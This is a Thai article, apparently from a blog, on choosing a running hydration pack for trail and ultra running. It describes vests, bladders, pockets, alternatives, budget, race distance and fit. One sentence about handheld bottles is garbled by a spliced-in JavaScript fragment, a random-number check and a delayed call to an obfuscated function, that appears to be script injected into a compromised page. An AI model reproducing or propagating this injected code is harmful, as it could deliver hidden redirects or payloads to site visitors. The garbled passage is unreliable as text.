เพราะต้องเดินเท้า บุกป่าฝ่าเขา แบกน้ำเป็นร้อยๆ ลิตร และสร้างจุดบริการน้ำไว้กลางป่า การวิ่งเทรลจึงไม่สะดวกต่อการตั้งจุดบริการให้น้ำ (water station) ได้ถี่ๆ เหมือนการวิ่งในพื้นที่เมือง พื้นที่ชุมชนทั่วไปที่สามารถตั้งได้ทุกระยะ 2 กิโลเมตร ทำให้นักวิ่งสายเทรลเกือบทุกคนจึงมี Running hydration pack เป็นของตัวเอง
Running hydration pack อุปกรณ์เสริมที่ขาดไม่ได้เลยสำหรับนักวิ่งเทรลหรือแม้แต่นักวิ่งระยะทางไกล 25, 50 กิโลเมตรจนไปถึง ultra (100 ไมล์) โดยส่วนประกอบหลักของกระเป๋านี้จะมี…
- ตัวกระเป๋าสะพาย (Vest) ดูๆ ไป วัสดุเนื้อผ้าที่ทำจะคล้ายๆ กับเป๋เดินป่า แต่จะถูกออกแบบให้มีความยืดหยุ่น ระบายอากาศและน้ำได้ดี บางเบา เนื้อที่ไม่เยอะ ใส่ของได้ไม่กี่อย่าง ทั้งนี้เพื่อต้องการให้มีน้ำหนักน้อยที่สุด มีสายรัดและยางยืดหรือวัสดุเนื้อผ้าที่ยืดหดตัวได้ เวลาใส่จะได้กระชับเข้ารูปตัวผู้วิ่งไม่ส่ายไปมา
- Hydration bladder หรือถุงใส่น้ำ ตามท้องตลาดในเมื่อไทยจะมีขนาด 1-2 ลิตร มีท่อเชื่อมต่อกับถุงน้ำด้วย เพิ่มสะดวกเวลาดื่มกิน
- Extra pocket ช่องใส่ของเพิ่มเติม เป็นหนึ่งในเอกลักษณ์ของ Running hydration pack สังเกตได้ว่าสายพาดไหล่ด้านหน้าจะมีช่องให้ใส่กระติกน้ำเพิมเติม หรือช่องใส่อุปกรณ์อื่นๆ อย่าง Powergel และมือถือ เป็นต้น

แม้เจ้า Running hydration pack จะเป็นที่นิยมแต่เรายังมีตัวเลือกอื่นๆ สำหรับนักวิ่งที่ประสงค์จะพกพาน้ำดื่มไปขณะวิ่งด้วย อย่างเช่น สายคาดเอวที่มีช่องเสียบกระติกน้ำขนาดเล็ก (hydration belt) และกระติกน้ำแบบเสียบเขากับฝ่ามือ (Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andheld water bottle)
วิธีการเลือกสามารถดูพิจารณาได้จาก…
1. งบประมาณของนักวิ่ง
ราคาของเจ้า Running hydration pack เริ่มจาก 1,000 บาทขึ้นไปจนถึง 5,000+ บาท อยากให้ผู้วิ่งควรตั้งงบประมาณตัวเองไว้ก่อนว่างบเรามีเท่าไหร และเท่าที่รู้ว่าถ้าอยากได้แบบเป้สะพายหลังต้องตั้งงบไว้ประมาณ 3,000+ นะครับ (แต่ได้ข่าวว่าบริษัท Vincita มีรุ่นหนึ่งขายอยู่ประมาณ 1,000 บาท)
2. ระยะทางแข่งขัน
ปริมาณน้ำที่พกพานั้นจะแปรตามระยะทางของการแข่งขัน ยิ่งระยะไกลมากขึ้น น้ำที่ต้องใช้ดื่มกินก็จะมากตาม นักวิ่งสามารถเลือกขนาดปริมาตรของกระติกน้ำหรือ bladder ที่จะพกพาได้ตั้งแต่ขนาดมิลลิลิตรไปจนถึงลิตร หรือจะเพิ่มจำนวนกระติกน้ำก็ได้
โดยทั่วไปจะนิยมใช้ bladder ขนาด 2L ครอบคลุมทุกการแข่ง เพราะราคาต่างจากขนาด 1L ไม่กี่ร้อยบาท ถ้าอยากให้เบาก็ใส่น้ำแค่ครึ่งหนึ่งแล้วเติมใหม่ แต่การเติมน้ำจะทำได้ช้ากว่าแบบกระติก เพราะต้องเปิดกระเป๋าดึงออกมา นักวิ่งบางท่านจึงใช้กระติกน้ำอ่อนๆ ( Soft Water bottle) ปริมาตร 500 กรัมโดยทั่วไป เพื่อบีบน้ำได้ง่าย ใส่ไว้ที่ช่องด้านหน้าสายพาดไหล่ หรือมีแบบพิเศษที่เรียกว่า Collapsible Bottle กระติกใส่น้ำที่สามารถพับได้ เบาและประหยัดเนื้อที่ นิยมพกพาไว้ 2 อัน
ระยะทางที่วิ่งในบ้านเราตามมาตรฐานก็อยู่ที่ 10-25-50 กิโลเมตร รายการใหญ่ๆ ก็ Ultra 100 ไมล์ นักวิ่งก็นิยมใช้ bladder 2L หรือกระติกน้ำขนาด 500 ml 2 อัน ก็สามารถวิ่งจบงานได้ครับ
3. Fit
แนะนำว่านักวิ่งทุกท่านควรจะทำการทดลองส่วมใส่ Running hydration pack ด้วยตัวเอง เหมือนกับการเลือกซื้อรองเท้าวิ่งนั้นแหละครับ บางรุ่นบางยี่ห้อฟิตไซด์แต่ละคนต่างกัน ทดลองเลือกรุ่นที่ใส่แล้วเรียบสนิทไปกับแผ่นหลัง กระชับ ไม่มีการ bouncing หรือเด้งขึ้นเด้งลงเวลาวิ่ง เคลื่อนที่ได้คล่องตัว และเช็คดูสายรัดปรับขนาดให้เราสามารถปรับความแน่นหลวมพอดีกับร่างกายเราได้
4. รายละเอียดย่อยอื่นๆ
รายละเอียดย่อยอื่นหรือพวก feature ที่น่าสนใจอย่างเช่น ความสามารถในการระบายอากาศ ระบายน้ำ สายพาดไหล่นุ่มสบาย ไม่ขัดสีกับผิวหนัง กระเป๋าด้านหลังระบายอากาสดีมั้ย มีแผ่นเสริมสำหรับใส่น้ำแข็ง หรือมีฉนวนกันความร้อนให้กับ bladder ด้วยมั้ย รวมทั้งช่องใส่ของต่างๆ เพิ่มเติม